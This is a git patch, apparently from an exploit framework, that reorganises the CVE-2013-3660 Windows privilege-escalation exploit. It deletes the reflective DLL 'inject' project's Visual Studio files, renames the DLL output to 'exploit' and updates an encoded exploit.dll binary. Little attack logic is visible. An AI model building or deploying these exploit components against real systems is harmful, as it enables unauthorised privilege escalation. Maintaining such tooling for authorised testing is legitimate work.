 .../cve-2013-3660/inject/src/LoadLibraryR.h   |  41 --
 .../inject/src/ReflectiveDLLInjection.h       |  51 ---
 .../source/exploits/cve-2013-3660/rdi.sln     |  28 +-
 14 files changed, 2 insertions(+), 1303 deletions(-)
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/inject.sln
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/inject.vcproj
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/inject.vcxproj
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/src/Inject.c
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
 delete mode 100755 external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h

diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll
index 8b7ae2134831b7ab7f7762cd62311766b8a957e7..706e1e1d246dc6a15955ca217e3000901f2fa1f6 100755
GIT binary patch
delta 1206
zcmeIw-%FEG7zgm@oL8qs*1FJju?q!}5n69aQ^ekPq^UI#on090Vy24~LMxX|i?$$Q
zh{W`@5X>+V83wjIn!CwHK}A2t>L!T@`voh#7$PMR)_0}UAJAoo_rrP4`<~~#obw!i
zQ1S<*Va99cHO}g`?pY?{WMM@5U(cWZ_s|g`vJufzSnFb=Y(nJmyIIU4-fn7P%pvw}
zK9$D&;!buIV<C}dXisNx;WfU`(8=SZpOLlZ{9IjWDlA246xZ{gW%J~?I8i1frWXau
zAZN0;XUUXUy?9d5B{8>FRegg6#bWgv&cfpPegngjpR7#BlQ+de!^aHdy*T*QfV{`Y
zTRHN!d#sGP#p#pX5*yHTo$V|lx;ig$HY@aJlFav65WR*tJb*BKgH+2wUjSyP1rC+i
zvl$jAh~7aQqA&*ipr1qzn4t#j;D#O;gBggyD@aU|kG>$FDWWY<2<3199N>Zu2*3bD
zAqI1>3>$9~nLvRiI1C=R2v;EjaY(=ttibwdA|sf<JZ&YaLSO?Ic;EtDh7d#`26M0g
z-(drGZ-P|o#)+JTqtK`A^I5ZM=VJ}2FC2D@YrYa=WiCoAVQ6ctY>eNpD=8YRu$=S$
z7^?1msK?!+iZXjkhqGv>yra0N*ld>VHfNi&x!q}Zdfjcuj(E1YTMvoCE3>@JaSPK|
zn;pM228sMQ^tCpEcjdh((qHp*sq+o?=H>h^^}j2%7#e<=zRS8=>pt9uR3X;{Fz$gM
z)EjUW(G#s!Q-nwBnHJ}UiBL30X;M6jR~b-7l&JDlNhq1BNv%;`>UlMwhSW#u2Q{Hm
c7?s8XnX*Z)kzH~??w7-ITu#bjWrnZ&37H~ljQ{`u

delta 1225
zcmeIyUr19?90%~<Id@JAEsJy_BNRkJvaShhh}^r-rnM0N5ekD+cf)88OU>pAwg)K*
zipeTgNh}i?1g4&uL&`=^W+d7}`4D3ffrSrZLL(yjn%JNB9y{C*=XdTszr#J}cey^l
z<nv1*#vSPa&T5K!)`&P+7*XcW>vz8~bVZ4piAXmV@UUU_T;%ho8LU>k+up{QOB~*D
zUdR06NtTtdsL&ZYQ&>W{jqg+SmJ!OFwgg%V^7Pf~VKqXdxL@!xi_=5VQ6?moCkmB2
zoLR&(OPa(^iWe0giTMK7ss}72R;%Ki#l*r<1H+OZZA{N;R4mthNJZYO<}U{1&7O5|
z<n8aWG3FB&&RvmMIH2$8WHZ9kbAz)bk$G{2dA|yxWk|qlh{4tfHicG**aTLv!%k?#
zo~^(UuZ|-R=3xqkAP>1FutF0!!3P5{1#=LGPmqj|m-G`jOxOeEa10#a0ykWOAcSEa
z;;;f~kBD}I8ET*%x}g{D!U)Vj0+OJcB-#eKuoui=owN}hN6-px=!Kgw3{jYYIIO@o
zNXO2NV21T}8>es$JTMqI;<aTs(&y^dpKz!Y_q+#<jWS9sVOZZ#*)V&iV^=u(`A}bO
z%982v<pmw?SCrY?y0zj1a!F}%smUbU>oup=(y7@yv{O#4t?P8RcEaIw?sGX>F?*v4
z<G>;>bB%3|anN`Lqo2r+B5bw@?v?kWXn)Mh#=(=nKR^3_>Hl5n#nsT8l=98m58~^<
zPve&$#sd(7S_9DpdZNFpD{c+fvhi>%TWME%l|Ch`M3i~ut&&u7RI}Qoy4CAyP>rgK
h>YAEVX%xlA8ac9AZj#+{P#%(FazdsO@qL<a`2nYZX;%OM

diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
index d01f1db543..1aae9cb3e1 100755
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
+++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
@@ -107,6 +107,7 @@
     <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
     <IntDir>$(Configuration)\</IntDir>
     <LinkIncremental>false</LinkIncremental>
+    <TargetName>exploit</TargetName>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
     <LinkIncremental>false</LinkIncremental>
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
index c8912a9e9d..29a70cc393 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
+++ b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
@@ -431,11 +431,6 @@ typedef __success(return >= 0) LONG NTSTATUS;
 typedef NTSTATUS *PNTSTATUS;
 #endif
 
-#ifndef PAGE_SIZE
-# define PAGE_SIZE 0x1000
-#endif
-
-
 // Search the specified data structure for a member with CurrentValue.
 BOOL FindAndReplaceMember(PDWORD Structure,
                           DWORD CurrentValue,
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.sln b/external/source/exploits/cve-2013-3660/inject/inject.sln
deleted file mode 100755
index e6c711e846..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject.vcproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
-		Release|Win32 = Release|Win32
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
-		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcproj b/external/source/exploits/cve-2013-3660/inject/inject.vcproj
deleted file mode 100755
index 87312eb71c..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.vcproj
+++ /dev/null
@@ -1,360 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="9.00"
-	Name="inject"
-	ProjectGUID="{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
-	RootNamespace="inject"
-	Keyword="Win32Proj"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-		<Platform
-			Name="x64"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="1"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Debug|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="1"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="2"
-				EnableIntrinsicFunctions="true"
-				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
-				RuntimeLibrary="0"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="1"
-				GenerateDebugInformation="true"
-				SubSystem="1"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-				CommandLine="copy ..\Release\inject.exe ..\bin\"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="2"
-				EnableIntrinsicFunctions="true"
-				PreprocessorDefinitions="WIN64;NDEBUG;_CONSOLE;_WIN64"
-				RuntimeLibrary="0"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="$(OutDir)\inject.x64.exe"
-				LinkIncremental="1"
-				GenerateDebugInformation="true"
-				SubSystem="1"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-				CommandLine="copy ..\x64\Release\inject.x64.exe ..\bin\"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\src\GetProcAddressR.c"
-				>
-			</File>
-			<File
-				RelativePath=".\src\Inject.c"
-				>
-			</File>
-			<File
-				RelativePath=".\src\LoadLibraryR.c"
-				>
-			</File>
-		</Filter>
-		<Filter
-			Name="Header Files"
-			Filter="h;hpp;hxx;hm;inl;inc;xsd"
-			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
-			>
-			<File
-				RelativePath=".\src\GetProcAddressR.h"
-				>
-			</File>
-			<File
-				RelativePath=".\src\LoadLibraryR.h"
-				>
-			</File>
-			<File
-				RelativePath=".\src\ReflectiveDLLInjection.h"
-				>
-			</File>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj
deleted file mode 100755
index 683ccc4aa7..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj
+++ /dev/null
@@ -1,258 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|ARM">
-      <Configuration>Debug</Configuration>
-      <Platform>ARM</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|ARM">
-      <Configuration>Release</Configuration>
-      <Platform>ARM</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{EEF3FD41-05D8-4A07-8434-EF5D34D76335}</ProjectGuid>
-    <RootNamespace>inject</RootNamespace>
-    <Keyword>Win32Proj</Keyword>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup>
-    <_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
-    <IntDir>$(Configuration)\</IntDir>
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <IntDir>$(Platform)\$(Configuration)\</IntDir>
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
-    <IntDir>$(Configuration)\</IntDir>
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <IntDir>$(Platform)\$(Configuration)\</IntDir>
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <MinimalRebuild>true</MinimalRebuild>
-      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Console</SubSystem>
-      <TargetMachine>MachineX86</TargetMachine>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
-    <ClCompile>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <MinimalRebuild>true</MinimalRebuild>
-      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Console</SubSystem>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <Midl>
-      <TargetEnvironment>X64</TargetEnvironment>
-    </Midl>
-    <ClCompile>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <MinimalRebuild>true</MinimalRebuild>
-      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Console</SubSystem>
-      <TargetMachine>MachineX64</TargetMachine>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <Optimization>MaxSpeed</Optimization>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;WIN_X86;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Console</SubSystem>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <TargetMachine>MachineX86</TargetMachine>
-    </Link>
-    <PostBuildEvent>
-      <Command>copy ..\Release\inject.exe ..\bin\</Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
-    <ClCompile>
-      <Optimization>MaxSpeed</Optimization>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;WIN_ARM;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Console</SubSystem>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OutputFile>$(OutDir)inject.arm.exe</OutputFile>
-      <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-    <PostBuildEvent>
-      <Command>copy ..\ARM\Release\inject.arm.exe ..\bin\</Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <Midl>
-      <TargetEnvironment>X64</TargetEnvironment>
-    </Midl>
-    <ClCompile>
-      <Optimization>MaxSpeed</Optimization>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN64;NDEBUG;_CONSOLE;_WIN64;WIN_X64;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <PrecompiledHeader />
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-    </ClCompile>
-    <Link>
-      <OutputFile>$(OutDir)inject.x64.exe</OutputFile>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <SubSystem>Console</SubSystem>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <TargetMachine>MachineX64</TargetMachine>
-    </Link>
-    <PostBuildEvent>
-      <Command>copy ..\x64\Release\inject.x64.exe ..\bin\</Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="src\GetProcAddressR.c" />
-    <ClCompile Include="src\Inject.c" />
-    <ClCompile Include="src\LoadLibraryR.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="src\GetProcAddressR.h" />
-    <ClInclude Include="src\LoadLibraryR.h" />
-    <ClInclude Include="src\ReflectiveDLLInjection.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
deleted file mode 100755
index 418896d025..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
+++ /dev/null
@@ -1,35 +0,0 @@
